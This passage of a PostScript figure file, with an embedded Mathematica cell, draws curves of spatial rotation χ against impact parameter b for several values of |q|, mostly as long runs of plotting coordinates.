+%Y/RkZ/QQg1bqf5ffOqGHGD7pbyzb5oQeYuAtyPDVdEIPMawqGHPrsSN6iGFj +%+pHCtY7oIYZXupeyhI74fZO/n6/E/99S9BCD2vclh1ctRQ8xGD0ouMVdih5i +%MEzJHrjtgB5iEPeWtXs4oIe83mEuSUIH9BBDQo/6uIf26CGff2ZjyAZ79BDD +%jTDueE179BDD6+E1rS/t0EMMA8t6L++yQw8xtB62ZE6yQw/5eAHLm4ps0UMM +%Q580QyJs0UMMe6b9dgxs0UMCV3b01HXYoIcEbK80ZF+zQQ8JtAUVqnjYoIcE +%fHXemAyzQQ8JnHKZfSvTGj3k9x9ywvZZo4cE1v7x7tbv1ughgUxVu/Z2K/SQ +%wNQPX1JuWKGHBIxkxhnrrdBDAmXujdN/sUIPCSwxWGBesgQ9JHDd5eTss0vQ +%QwLvh5+86rwEPSTAMTh/TLIEPSTwarePT/Zi9JDAv4bxlScWo4cEsk5PLbBZ +%jB4SsOHMSRIuRg8JpD4dpvfWEj0k8LHZ+EiEJXpIYNSdDeNsLdFDAj47Hqap +%W6KHBLT0nmrnLEIPCVSY6dZHL0IPKVwNFX5zWYQeUri7eIqR9iL0kAJX/1dG +%qQV6SOHI5CneVyzQQwqhST1nfSzQQz7eVqn1dAv0kAJ71ZOTneboIYXHN71M +%HpmjhxQcnGM37DNHDymEWNx3tDJHDynMGLHAV2qOHlK4b7x8eLEZekjB7eMx +%vatm6CEFE+ulwVvN0EMKKddI0Gwz9JCC8dncCqYZekjB1W+4yduF6CGFywfW +%jDq7ED2kwGl69mjtQvSQwuDe2rIZC9FDCtWnvEIHTNFD/vwt7/a+MUUPKVjH +%6XLiTNFDCn9kjvmwzhQ9pFD4yiXfyBQ9NGCbumUmU/76/4f9glI= +% "]]}}, +% AspectRatio->NCache[GoldenRatio^(-1), 0.6180339887498948], +% Axes->None, +% AxesOrigin->{0, 0}, +% Epilog->{ +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.02\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.02"]], TraditionalForm]], {0.8, 4}, BaseStyle \ +%-> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.05\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.05"]], TraditionalForm]], {1.67, 6.4}, \ +%BaseStyle -> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.07\"", TraditionalForm]], "Text", "TR"], +% Text["|q| = 0.07"]], TraditionalForm]], {2.85, 12}, \ +%BaseStyle -> 14], +% InsetBox[ +% BoxData[ +% FormBox[ +% InterpretationBox[ +% Cell[ +% BoxData[ +% FormBox["\"|q| = 0.1\"", TraditionalForm]], "Text", "TR"], \ +% +% Text["|q| = 0.1"]], TraditionalForm]], {3.2, 7}, BaseStyle \ +%-> 14], Null}, +% Frame->True, +% FrameLabel->{ +% FormBox["\"Impact parameter, b\"", TraditionalForm], +% FormBox["\"Spatial rotation, \[Chi]\"", TraditionalForm]}, +% FrameStyle->{{14, +% GrayLevel[1]}, {14, +% GrayLevel[1]}}, +% FrameTicks->{Automatic, {{0, +% FormBox["0", TraditionalForm]}, { +% NCache[Pi, 3.141592653589793], +% FormBox["\[Pi]", TraditionalForm]}, { +% NCache[2 Pi, 6.283185307179586], +% FormBox[ +% RowBox[{"2", " ", "\[Pi]"}], TraditionalForm]}, { +% NCache[3 Pi, 9.42477796076938], +% FormBox[ +% RowBox[{"3", " ", "\[Pi]"}], TraditionalForm]}, { +% NCache[4 Pi, 12.566370614359172`], +% FormBox[ +% RowBox[{"4", " ", "\[Pi]"}], TraditionalForm]}}}, +% FrameTicksStyle->{16, 16}, +% ImageSize->600, +% PlotRange->{All, All}, +% PlotRangeClipping->True, +% PlotRangePadding->{Automatic, Automatic}, +% TicksStyle->16]], "Output", +% CellChangeTimes->{3.556953242036603*^9, {3.556953596625984*^9, \ +%3.556953702375863*^9}, {3.556953796337514*^9, 3.556953956593231*^9}, \ +%{3.556954020687426*^9, 3.556954030706046*^9}, { +% 3.558693364370013*^9, 3.5586933829491863`*^9}, \ +%{3.55869345851305*^9, 3.5586934742140837`*^9}}] +%%EndMathematicaCell +p +np 33 1 m +33 273 L +469 273 L +469 1 L +cp +clip np +p +np 35 3 m +35 271 L +467 271 L +467 3 L +cp +clip np +3.239 setmiterlimit +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +P +p +np 70 3 m +70 238 L +450 238 L +450 3 L +cp +clip np +0 g +0.36 w +[ ] 0 setdash +3.25 setmiterlimit +78.19 226.892 m +78.919 226.724 L +79.648 226.555 L +80.376 226.386 L +81.105 226.217 L +81.834 226.048 L +82.562 225.878 L +83.291 225.707 L +84.02 225.537 L +84.749 225.366 L +85.477 225.194 L +86.206 225.022 L +86.935 224.85 L +87.663 224.678 L +88.392 224.505 L +89.121 224.331 L +89.849 224.158 L +90.578 223.984 L +91.307 223.809 L +92.035 223.635 L +92.764 223.459 L +93.493 223.284 L +94.221 223.108 L +94.95 222.932 L +95.679 222.755 L +96.407 222.578 L +97.136 222.4 L +97.865 222.222 L +98.593 222.044 L +99.322 221.865 L +100.051 221.686 L +100.779 221.507 L +101.508 221.327 L +102.237 221.147 L +102.965 220.966 L +103.694 220.785 L +104.423 220.604 L +105.152 220.422 L +105.88 220.24 L +106.609 220.057 L +107.338 219.874 L +108.066 219.691 L +108.795 219.507 L +109.524 219.323 L +110.252 219.138 L +110.981 218.953 L +111.71 218.767 L +112.438 218.581 L +113.167 218.395 L +113.896 218.208 L +114.624 218.021 L +115.353 217.833 L +116.082 217.645 L +116.81 217.457 L +117.539 217.268 L +118.268 217.078 L +118.996 216.889 L +119.725 216.698 L +120.454 216.508 L +121.182 216.316 L +121.911 216.125 L +122.64 215.933 L +123.368 215.74 L +124.097 215.547 L +124.826 215.354 L +125.554 215.16 L +126.283 214.965 L +127.012 214.77 L +127.741 214.575 L +128.469 214.379 L +129.198 214.183 L +129.927 213.986 L +130.655 213.789 L +131.384 213.591 L +132.113 213.392 L +132.841 213.194 L +133.57 212.994 L +134.299 212.794 L +135.027 212.594 L +135.756 212.393 L +136.485 212.192 L +137.213 211.99 L +137.942 211.787 L +138.671 211.584 L +139.399 211.38 L +140.128 211.176 L +140.857 210.972 L +141.585 210.766 L +142.314 210.56 L +143.043 210.354 L +143.771 210.147 L +144.5 209.939 L +145.229 209.731 L +145.957 209.522 L +146.686 209.313 L +147.415 209.103 L +148.144 208.893 L +148.872 208.681 L +149.601 208.47 L +150.33 208.257 L +151.058 208.044 L +151.787 207.83 L +152.516 207.616 L +153.244 207.401 L +153.973 207.185 L +154.702 206.969 L +155.43 206.752 L +156.159 206.534 L +156.888 206.316 L +157.616 206.097 L +158.345 205.877 L +159.074 205.656 L +159.802 205.435 L +160.531 205.213 L +161.26 204.99 L +161.988 204.767 L +162.717 204.542 L +163.446 204.317 L +164.174 204.092 L +164.903 203.865 L +165.632 203.638 L +166.36 203.409 L +167.089 203.181 L +167.818 202.951 L +168.547 202.72 L +169.275 202.489 L +170.004 202.256 L +170.733 202.023 L +171.461 201.789 L +172.19 201.554 L +172.919 201.318 L +173.647 201.081 L +174.376 200.844 L +175.105 200.605 L +175.833 200.365 L +176.562 200.125 L +177.291 199.883 L +178.019 199.641 L +178.748 199.397 L +179.477 199.153 L +180.205 198.907 L +180.934 198.661 L +181.663 198.413 L +182.391 198.164 L +183.12 197.914 L +183.849 197.664 L +184.577 197.412 L +185.306 197.158 L +186.035 196.904 L +186.763 196.649 L +187.492 196.392 L +188.221 196.134 L +188.95 195.875 L +189.678 195.615 L +190.407 195.353 L +191.136 195.091 L +191.864 194.826 L +192.593 194.561 L +193.322 194.294 L +194.05 194.026 L +194.779 193.757 L +195.508 193.486 L +196.236 193.214 L +196.965 192.94 L +197.694 192.665 L +198.422 192.388 L +199.151 192.11 L +199.88 191.83 L +200.608 191.549 L +201.337 191.266 L +202.066 190.981 L +202.794 190.695 L +203.523 190.408 L +204.252 190.118 L +204.98 189.827 L +205.709 189.534 L +206.438 189.239 L +207.166 188.942 L +207.895 188.644 L +208.624 188.343 L +209.353 188.041 L +210.081 187.737 L +210.81 187.43 L +211.539 187.122 L +212.267 186.811 L +212.996 186.499 L +213.725 186.184 L +214.453 185.867 L +215.182 185.548 L +215.911 185.226 L +216.639 184.903 L +217.368 184.576 L +218.097 184.248 L +218.825 183.917 L +219.554 183.583 L +220.283 183.247 L +221.011 182.908 L +221.74 182.566 L +222.469 182.221 L +223.197 181.874 L +223.926 181.524 L +224.655 181.171 L +225.383 180.815 L +226.112 180.455 L +226.841 180.093 L +227.569 179.727 L +228.298 179.358 L +229.027 178.986 L +229.756 178.61 L +230.484 178.23 L +231.213 177.847 L +231.942 177.46 L +232.67 177.069 L +233.399 176.674 L +234.128 176.276 L +234.856 175.872 L +235.585 175.465 L +236.314 175.053 L +237.042 174.637 L +237.771 174.216 L +238.5 173.79 L +239.228 173.359 L +239.957 172.924 L +240.686 172.482 L +241.414 172.036 L +242.143 171.584 L +242.872 171.126 L +243.6 170.662 L +244.329 170.192 L +245.058 169.716 L +245.786 169.233 L +246.515 168.744 L +247.244 168.247 L +247.972 167.743 L +248.701 167.232 L +249.43 166.713 L +250.159 166.186 L +250.887 165.65 L +251.616 165.106 L +252.345 164.553 L +253.073 163.99 L +253.802 163.417 L +254.531 162.834 L +255.259 162.241 L +255.988 161.636 L +256.717 161.02 L +257.445 160.391 L +258.174 159.75 L +258.903 159.095 L +259.631 158.426 L +260.36 157.743 L +261.089 157.044 L +261.817 156.328 L +262.546 155.595 L +263.275 154.844 L +264.003 154.074 L +264.732 153.283 L +265.461 152.471 L +266.189 151.635 L +266.918 150.774 L +267.647 149.887 L +268.375 148.972 L +269.104 148.026 L +269.833 147.047 L +270.561 146.033 L +271.29 144.98 L +272.019 143.886 L +272.748 142.746 L +273.476 141.556 L +274.205 140.31 L +274.934 139.004 L +275.662 137.63 L +276.391 136.179 L +277.12 134.642 L +277.848 133.005 L +278.577 131.258 L +279.306 129.378 L +280.034 127.344 L +280.763 125.125 L +281.492 122.683 L +282.22 119.959 L +282.949 116.88 L +283.678 113.326 L +284.406 109.112 L +285.135 103.916 L +285.864 97.083 L +286.592 86.986 L +287.321 66.511 L +288.05 107.215 L +288.778 120.201 L +289.507 125.455 L +290.236 128.764 L +290.964 131.167 L +291.693 133.043 L +292.422 134.577 L +293.151 135.87 L +293.879 136.983 L +294.608 137.958 L +295.337 138.825 L +296.065 139.602 L +296.794 140.306 L +297.523 140.948 L +298.251 141.537 L +298.98 142.081 L +299.709 142.585 L +300.437 143.054 L +301.166 143.493 L +301.895 143.904 L +302.623 144.291 L +303.352 144.655 L +304.081 145 L +304.809 145.327 L +305.538 145.636 L +306.267 145.931 L +306.995 146.212 L +307.724 146.479 L +308.453 146.735 L +309.181 146.98 L +309.91 147.214 L +310.639 147.439 L +311.367 147.655 L +312.096 147.863 L +312.825 148.062 L +313.554 148.255 L +314.282 148.44 L +315.011 148.619 L +315.74 148.792 L +316.468 148.959 L +317.197 149.12 L +317.926 149.276 L +318.654 149.427 L +319.383 149.574 L +320.112 149.716 L +320.84 149.853 L +321.569 149.987 L +322.298 150.117 L +323.026 150.243 L +323.755 150.366 L +324.484 150.485 L +325.212 150.601 L +325.941 150.713 L +326.67 150.823 L +327.398 150.93 L +328.127 151.035 L +328.856 151.136 L +329.584 151.235 L +330.313 151.332 L +331.042 151.426 L +331.77 151.518 L +332.499 151.608 L +333.228 151.696 L +333.957 151.782 L +334.685 151.866 L +335.414 151.948 L +336.143 152.028 L +336.871 152.106 L +337.6 152.183 L +338.329 152.258 L +339.057 152.331 L +339.786 152.403 L +340.515 152.474 L +341.243 152.542 L +341.972 152.61 L +342.701 152.676 L +343.429 152.741 L +344.158 152.805 L +344.887 152.867 L +345.615 152.928 L +346.344 152.988 L +347.073 153.047 L +347.801 153.105 L +348.53 153.161 L +349.259 153.217 L +349.987 153.271 L +350.716 153.325 L +351.445 153.377 L +352.173 153.429 L +352.902 153.48 L +353.631 153.53 L +354.36 153.579 L +355.088 153.627 L +355.817 153.674 L +356.546 153.721 L +357.274 153.766 L +358.003 153.811 L +358.732 153.855 L +359.46 153.899 L +360.189 153.942 L +360.918 153.984 L +361.646 154.025 L +362.375 154.066 L +363.104 154.106 L +363.832 154.145 L +364.561 154.184 L +365.29 154.222 L +366.018 154.26 L +366.747 154.297 L +367.476 154.333 L +368.204 154.369 L +368.933 154.405 L +369.662 154.44 L +370.39 154.474 L +371.119 154.508 L +371.848 154.541 L +372.576 154.574 L +373.305 154.606 L +374.034 154.638 L +374.763 154.669 L +375.491 154.7 L +376.22 154.731 L +376.949 154.761 L +377.677 154.791 L +378.406 154.82 L +379.135 154.849 L +379.863 154.877 L +380.592 154.905 L +381.321 154.933 L +382.049 154.96 L +382.778 154.987 L +383.507 155.014 L +384.235 155.04 L +384.964 155.066 L +385.693 155.092 L +386.421 155.117 L +387.15 155.142 L +387.879 155.166 L +388.607 155.19 L +389.336 155.214 L +390.065 155.238 L +390.793 155.261 L +391.522 155.284 L +392.251 155.307 L +392.979 155.33 L +393.708 155.352 L +394.437 155.374 L +395.166 155.395 L +395.894 155.417 L +396.623 155.438 L +397.352 155.458 L +398.08 155.479 L +398.809 155.499 L +399.538 155.519 L +400.266 155.539 L +400.995 155.559 L +401.724 155.578 L +402.452 155.597 L +403.181 155.616 L +403.91 155.635 L +404.638 155.653 L +405.367 155.672 L +406.096 155.69 L +406.824 155.708 L +407.553 155.725 L +408.282 155.743 L +409.01 155.76 L +409.739 155.777 L +410.468 155.794 L +411.196 155.811 L +411.925 155.827 L +412.654 155.843 L +413.382 155.859 L +414.111 155.875 L +414.84 155.891 L +415.568 155.907 L +416.297 155.922 L +417.026 155.937 L +417.755 155.952 L +418.483 155.967 L +419.212 155.982 L +419.941 155.997 L +420.669 156.011 L +421.398 156.025 L +422.127 156.04 L +422.855 156.054 L +423.584 156.067 L +424.313 156.081 L +425.041 156.095 L +425.77 156.108 L +426.499 156.121 L +427.227 156.135 L +427.956 156.148 L +428.685 156.16 L +429.413 156.173 L +430.142 156.186 L +430.871 156.198 L +431.599 156.211 L +432.328 156.223 L +433.057 156.235 L +433.785 156.247 L +434.514 156.259 L +435.243 156.271 L +435.971 156.282 L +436.7 156.294 L +437.429 156.305 L +438.158 156.316 L +438.886 156.328 L +439.615 156.339 L +440.344 156.35 L +441.072 156.36 L +441.801 156.371 L +442.53 156.382 L +s +78.19 227.244 m +78.919 227.062 L +79.648 226.879 L +80.376 226.696 L +81.105 226.513 L +81.834 226.329 L +82.562 226.144 L +83.291 225.96 L +84.02 225.774 L +84.749 225.589 L +85.477 225.403 L +86.206 225.216 L +86.935 225.029 L +87.663 224.842 L +88.392 224.654 L +89.121 224.465 L +89.849 224.277 L +90.578 224.088 L +91.307 223.898 L +92.035 223.708 L +92.764 223.518 L +93.493 223.327 L +94.221 223.135 L +94.95 222.944 L +95.679 222.751 L +96.407 222.559 L +97.136 222.366 L +97.865 222.172 L +98.593 221.978 L +99.322 221.783 L +100.051 221.589 L +100.779 221.393 L +101.508 221.197 L +102.237 221.001 L +102.965 220.804 L +103.694 220.607 L +104.423 220.409 L +105.152 220.211 L +105.88 220.013 L +106.609 219.813 L +107.338 219.614 L +108.066 219.414 L +108.795 219.213 L +109.524 219.012 L +110.252 218.811 L +110.981 218.609 L +111.71 218.406 L +112.438 218.203 L +113.167 217.999 L +113.896 217.795 L +114.624 217.591 L +115.353 217.386 L +116.082 217.18 L +116.81 216.974 L +117.539 216.767 L +118.268 216.56 L +118.996 216.352 L +119.725 216.144 L +120.454 215.935 L +121.182 215.726 L +121.911 215.516 L +122.64 215.305 L +123.368 215.094 L +124.097 214.883 L +124.826 214.67 L +125.554 214.458 L +126.283 214.244 L +127.012 214.03 L +127.741 213.816 L +128.469 213.6 L +129.198 213.385 L +129.927 213.168 L +130.655 212.951 L +131.384 212.733 L +132.113 212.515 L +132.841 212.296 L +133.57 212.076 L +134.299 211.856 L +135.027 211.635 L +135.756 211.413 L +136.485 211.191 L +137.213 210.968 L +137.942 210.744 L +138.671 210.52 L +139.399 210.294 L +140.128 210.068 L +140.857 209.842 L +141.585 209.614 L +142.314 209.386 L +143.043 209.157 L +143.771 208.927 L +144.5 208.697 L +145.229 208.466 L +145.957 208.234 L +146.686 208.001 L +147.415 207.767 L +148.144 207.532 L +148.872 207.297 L +149.601 207.06 L +150.33 206.823 L +151.058 206.585 L +151.787 206.346 L +152.516 206.106 L +153.244 205.865 L +153.973 205.623 L +154.702 205.381 L +155.43 205.137 L +156.159 204.892 L +156.888 204.646 L +157.616 204.4 L +158.345 204.152 L +159.074 203.903 L +159.802 203.653 L +160.531 203.402 L +161.26 203.15 L +161.988 202.897 L +162.717 202.643 L +163.446 202.387 L +164.174 202.131 L +164.903 201.873 L +165.632 201.614 L +166.36 201.354 L +167.089 201.092 L +167.818 200.83 L +168.547 200.565 L +169.275 200.3 L +170.004 200.033 L +170.733 199.765 L +171.461 199.496 L +172.19 199.225 L +172.919 198.953 L +173.647 198.68 L +174.376 198.405 L +175.105 198.128 L +175.833 197.85 L +176.562 197.57 L +177.291 197.289 L +178.019 197.006 L +178.748 196.722 L +179.477 196.435 L +180.205 196.148 L +180.934 195.858 L +181.663 195.567 L +182.391 195.274 L +183.12 194.979 L +183.849 194.682 L +184.577 194.383 L +185.306 194.083 L +186.035 193.78 L +186.763 193.475 L +187.492 193.169 L +188.221 192.86 L +188.95 192.549 L +189.678 192.236 L +190.407 191.921 L +191.136 191.603 L +191.864 191.284 L +192.593 190.961 L +193.322 190.637 L +194.05 190.31 L +194.779 189.98 L +195.508 189.648 L +196.236 189.313 L +196.965 188.976 L +197.694 188.635 L +198.422 188.292 L +199.151 187.946 L +199.88 187.598 L +200.608 187.246 L +201.337 186.891 L +202.066 186.533 L +202.794 186.171 L +203.523 185.807 L +204.252 185.438 L +204.98 185.067 L +205.709 184.692 L +206.438 184.313 L +207.166 183.93 L +207.895 183.544 L +208.624 183.153 L +209.353 182.759 L +210.081 182.36 L +210.81 181.957 L +211.539 181.549 L +212.267 181.137 L +212.996 180.72 L +213.725 180.299 L +214.453 179.872 L +215.182 179.44 L +215.911 179.003 L +216.639 178.56 L +217.368 178.112 L +218.097 177.657 L +218.825 177.197 L +219.554 176.73 L +220.283 176.257 L +221.011 175.777 L +221.74 175.29 L +222.469 174.796 L +223.197 174.295 L +223.926 173.785 L +224.655 173.268 L +225.383 172.742 L +226.112 172.207 L +226.841 171.662 L +227.569 171.109 L +228.298 170.546 L +229.027 169.971 L +229.756 169.387 L +230.484 168.79 L +231.213 168.182 L +231.942 167.561 L +232.67 166.927 L +233.399 166.28 L +234.128 165.617 L +234.856 164.94 L +235.585 164.246 L +236.314 163.535 L +237.042 162.806 L +237.771 162.058 L +238.5 161.289 L +239.228 160.499 L +239.957 159.686 L +240.686 158.848 L +241.414 157.985 L +242.143 157.093 L +242.872 156.17 L +243.6 155.216 L +244.329 154.226 L +245.058 153.198 L +245.786 152.13 L +246.515 151.016 L +247.244 149.854 L +247.972 148.638 L +248.701 95.265 L +249.43 93.925 L +250.159 92.513 L +250.887 91.021 L +251.616 89.437 L +252.345 87.751 L +253.073 85.948 L +253.802 84.008 L +254.531 81.914 L +255.259 79.635 L +255.988 77.137 L +256.717 74.37 L +257.445 71.271 L +258.174 67.749 L +258.903 63.665 L +259.631 58.799 L +260.36 52.774 L +261.089 44.836 L +261.817 33.16 L +262.546 10.25 L +263.275 102.86 L +264.003 118.171 L +264.732 124.159 L +265.461 127.877 L +266.189 130.553 L +266.918 132.626 L +267.647 134.311 L +268.375 135.722 L +269.104 136.932 L +269.833 137.986 L +270.561 138.919 L +271.29 139.753 L +272.019 140.505 L +272.748 141.189 L +273.476 141.814 L +274.205 142.389 L +274.934 142.921 L +275.662 143.415 L +276.391 143.875 L +277.12 144.305 L +277.848 144.709 L +278.577 145.088 L +279.306 145.446 L +280.034 145.784 L +280.763 146.105 L +281.492 146.409 L +282.22 146.698 L +282.949 146.973 L +283.678 147.236 L +284.406 147.486 L +285.135 147.726 L +285.864 147.955 L +286.592 148.175 L +287.321 148.386 L +288.05 148.589 L +288.778 148.784 L +289.507 148.972 L +290.236 149.152 L +290.964 149.327 L +291.693 149.495 L +292.422 149.657 L +293.151 149.814 L +293.879 149.965 L +294.608 150.112 L +295.337 150.254 L +296.065 150.392 L +296.794 150.525 L +297.523 150.654 L +298.251 150.78 L +298.98 150.901 L +299.709 151.02 L +300.437 151.135 L +301.166 151.246 L +301.895 151.355 L +302.623 151.46 L +303.352 151.563 L +304.081 151.663 L +304.809 151.761 L +305.538 151.856 L +306.267 151.949 L +306.995 152.039 L +307.724 152.127 L +308.453 152.213 L +309.181 152.297 L +309.91 152.379 L +310.639 152.459 L +311.367 152.537 L +312.096 152.613 L +312.825 152.688 L +313.554 152.761 L +314.282 152.832 L +315.011 152.902 L +315.74 152.97 L +316.468 153.037 L +317.197 153.102 L +317.926 153.166 L +318.654 153.228 L +319.383 153.29 L +320.112 153.35 L +320.84 153.409 L +321.569 153.466 L +322.298 153.523 L +323.026 153.578 L +323.755 153.633 L +324.484 153.686 L +325.212 153.738 L +325.941 153.789 L +326.67 153.84 L +327.398 153.889 L +328.127 153.937 L +328.856 153.985 L +329.584 154.032 L +330.313 154.078 L +331.042 154.123 L +331.77 154.167 L +332.499 154.21 L +333.228 154.253 L +333.957 154.295 L +334.685 154.336 L +335.414 154.376 L +336.143 154.416 L +336.871 154.455 L +337.6 154.494 L +338.329 154.532 L +339.057 154.569 L +339.786 154.606 L +340.515 154.642 L +341.243 154.677 L +341.972 154.712 L +342.701 154.746 L +343.429 154.78 L +344.158 154.813 L +344.887 154.846 L +345.615 154.878 L +346.344 154.91 L +347.073 154.941 L +347.801 154.972 L +348.53 155.002 L +349.259 155.032 L +349.987 155.061 L +350.716 155.09 L +351.445 155.118 L +352.173 155.146 L +352.902 155.174 L +353.631 155.201 L +354.36 155.228 L +355.088 155.255 L +355.817 155.281 L +356.546 155.306 L +357.274 155.332 L +358.003 155.357 L +358.732 155.381 L +359.46 155.406 L +360.189 155.43 L +360.918 155.453 L +361.646 155.476 L +362.375 155.499 L +363.104 155.522 L +363.832 155.544 L +364.561 155.567 L +365.29 155.588 L +366.018 155.61 L +366.747 155.631 L +367.476 155.652 L +368.204 155.672 L +368.933 155.693 L +369.662 155.713 L +370.39 155.733 L +371.119 155.752 L +371.848 155.772 L +372.576 155.791 L +373.305 155.81 L +374.034 155.828 L +374.763 155.847 L +375.491 155.865 L +376.22 155.883 L +376.949 155.9 L +377.677 155.918 L +378.406 155.935 L +379.135 155.952 L +379.863 155.969 L +380.592 155.986 L +381.321 156.002 L +382.049 156.018 L +382.778 156.034 L +383.507 156.05 L +384.235 156.066 L +384.964 156.081 L +385.693 156.097 L +386.421 156.112 L +387.15 156.127 L +387.879 156.141 L +388.607 156.156 L +389.336 156.171 L +390.065 156.185 L +390.793 156.199 L +391.522 156.213 L +392.251 156.227 L +392.979 156.24 L +393.708 156.254 L +394.437 156.267 L +395.166 156.28 L +395.894 156.293 L +396.623 156.306 L +397.352 156.319 L +398.08 156.331 L +398.809 156.344 L +399.538 156.356 L +400.266 156.368 L +400.995 156.38 L +401.724 156.392 L +402.452 156.404 L +403.181 156.416 L +403.91 156.427 L +404.638 156.439 L +405.367 156.45 L +406.096 156.461 L +406.824 156.472 L +407.553 156.483 L +408.282 156.494 L +409.01 156.505 L +409.739 156.515 L +410.468 156.526 L +411.196 156.536 L +411.925 156.546 L +412.654 156.557 L +413.382 156.567 L +414.111 156.577 L +414.84 156.587 L +415.568 156.596 L +416.297 156.606 L +417.026 156.616 L +417.755 156.625 L +418.483 156.634 L +419.212 156.644 L +419.941 156.653 L +420.669 156.662 L +421.398 156.671 L +422.127 156.68 L +422.855 156.689 L +423.584 156.697 L +424.313 156.706 L +425.041 156.715 L +425.77 156.723 L +426.499 156.732 L +427.227 156.74 L +427.956 156.748 L +428.685 156.756 L +429.413 156.764 L +430.142 156.772 L +430.871 156.78 L +431.599 156.788 L +432.328 156.796 L +433.057 156.804 L +433.785 156.811 L +434.514 156.819 L +435.243 156.826 L +435.971 156.834 L +436.7 156.841 L +437.429 156.849 L +438.158 156.856 L +438.886 156.863 L +439.615 156.87 L +440.344 156.877 L +441.072 156.884 L +441.801 156.891 L +442.53 156.898 L +s +78.19 227.796 m +78.555 227.699 L +78.919 227.602 L +79.283 227.504 L +79.648 227.407 L +80.012 227.309 L +80.376 227.211 L +80.741 227.113 L +81.105 227.016 L +81.469 226.917 L +81.834 226.819 L +82.198 226.721 L +82.562 226.622 L +82.927 226.524 L +83.291 226.425 L +83.655 226.327 L +84.02 226.228 L +84.384 226.129 L +84.749 226.03 L +85.113 225.93 L +85.477 225.831 L +85.842 225.732 L +86.206 225.632 L +86.57 225.532 L +86.935 225.433 L +87.299 225.333 L +87.663 225.233 L +88.028 225.133 L +88.392 225.032 L +88.756 224.932 L +89.121 224.832 L +89.485 224.731 L +89.849 224.63 L +90.214 224.53 L +90.578 224.429 L +90.942 224.328 L +91.307 224.227 L +91.671 224.125 L +92.035 224.024 L +92.4 223.923 L +92.764 223.821 L +93.128 223.719 L +93.493 223.618 L +93.857 223.516 L +94.221 223.414 L +94.586 223.311 L +94.95 223.209 L +95.314 223.107 L +95.679 223.004 L +96.043 222.902 L +96.407 222.799 L +96.772 222.696 L +97.136 222.593 L +97.5 222.49 L +97.865 222.387 L +98.229 222.284 L +98.593 222.18 L +98.958 222.077 L +99.322 221.973 L +99.686 221.869 L +100.051 221.765 L +100.415 221.661 L +100.779 221.557 L +101.144 221.453 L +101.508 221.349 L +101.872 221.244 L +102.237 221.14 L +102.601 221.035 L +102.965 220.93 L +103.33 220.825 L +103.694 220.72 L +104.058 220.615 L +104.423 220.51 L +104.787 220.404 L +105.152 220.299 L +105.516 220.193 L +105.88 220.087 L +106.245 219.981 L +106.609 219.875 L +106.973 219.769 L +107.338 219.663 L +107.702 219.556 L +108.066 219.45 L +108.431 219.343 L +108.795 219.236 L +109.159 219.129 L +109.524 219.022 L +109.888 218.915 L +110.252 218.808 L +110.617 218.7 L +110.981 218.593 L +111.345 218.485 L +111.71 218.377 L +112.074 218.269 L +112.438 218.161 L +112.803 218.053 L +113.167 217.945 L +113.531 217.836 L +113.896 217.727 L +114.26 217.619 L +114.624 217.51 L +114.989 217.401 L +115.353 217.291 L +115.717 217.182 L +116.082 217.073 L +116.446 216.963 L +116.81 216.853 L +117.175 216.743 L +117.539 216.633 L +117.903 216.523 L +118.268 216.413 L +118.632 216.303 L +118.996 216.192 L +119.361 216.081 L +119.725 215.97 L +120.089 215.859 L +120.454 215.748 L +120.818 215.637 L +121.182 215.525 L +121.547 215.414 L +121.911 215.302 L +122.275 215.19 L +122.64 215.078 L +123.004 214.965 L +123.368 214.853 L +123.733 214.74 L +124.097 214.628 L +124.461 214.515 L +124.826 214.402 L +125.19 214.288 L +125.554 214.175 L +125.919 214.061 L +126.283 213.948 L +126.648 213.834 L +127.012 213.72 L +127.376 213.605 L +127.741 213.491 L +128.105 213.376 L +128.469 213.262 L +128.834 213.147 L +129.198 213.032 L +129.562 212.916 L +129.927 212.801 L +130.291 212.685 L +130.655 212.57 L +131.02 212.454 L +131.384 212.337 L +131.748 212.221 L +132.113 212.105 L +132.477 211.988 L +132.841 211.871 L +133.206 211.754 L +133.57 211.636 L +133.934 211.519 L +134.299 211.401 L +134.663 211.283 L +135.027 211.165 L +135.392 211.047 L +135.756 210.928 L +136.12 210.81 L +136.485 210.691 L +136.849 210.572 L +137.213 210.452 L +137.578 210.332 L +137.942 210.213 L +138.306 210.093 L +138.671 209.973 L +139.035 209.852 L +139.399 209.732 L +139.764 209.611 L +140.128 209.49 L +140.492 209.368 L +140.857 209.247 L +141.221 209.125 L +141.585 209.003 L +141.95 208.881 L +142.314 208.758 L +142.678 208.635 L +143.043 208.513 L +143.407 208.389 L +143.771 208.266 L +144.136 208.142 L +144.5 208.018 L +144.864 207.894 L +145.229 207.77 L +145.593 207.645 L +145.957 207.52 L +146.322 207.395 L +146.686 207.269 L +147.051 207.143 L +147.415 207.017 L +147.779 206.891 L +148.144 206.764 L +148.508 206.637 L +148.872 206.51 L +149.237 206.383 L +149.601 206.255 L +149.965 206.127 L +150.33 205.999 L +150.694 205.87 L +151.058 205.741 L +151.423 205.612 L +151.787 205.483 L +152.151 205.353 L +152.516 205.223 L +152.88 205.092 L +153.244 204.962 L +153.609 204.831 L +153.973 204.699 L +154.337 204.567 L +154.702 204.435 L +155.066 204.303 L +155.43 204.17 L +155.795 204.037 L +156.159 203.904 L +156.523 203.77 L +156.888 203.636 L +157.252 203.502 L +157.616 203.367 L +157.981 203.232 L +158.345 203.096 L +158.709 202.961 L +159.074 202.824 L +159.438 202.688 L +159.802 202.551 L +160.167 202.414 L +160.531 202.276 L +160.895 202.138 L +161.26 201.999 L +161.624 201.86 L +161.988 201.721 L +162.353 201.581 L +162.717 201.441 L +163.081 201.301 L +163.446 201.16 L +163.81 201.018 L +164.174 200.877 L +164.539 200.735 L +164.903 200.592 L +165.267 200.449 L +165.632 200.305 L +165.996 200.161 L +166.36 200.017 L +166.725 199.872 L +167.089 199.727 L +167.454 199.581 L +167.818 199.435 L +168.182 199.288 L +168.547 199.141 L +168.911 198.993 L +169.275 198.845 L +169.64 198.696 L +170.004 198.547 L +170.368 198.397 L 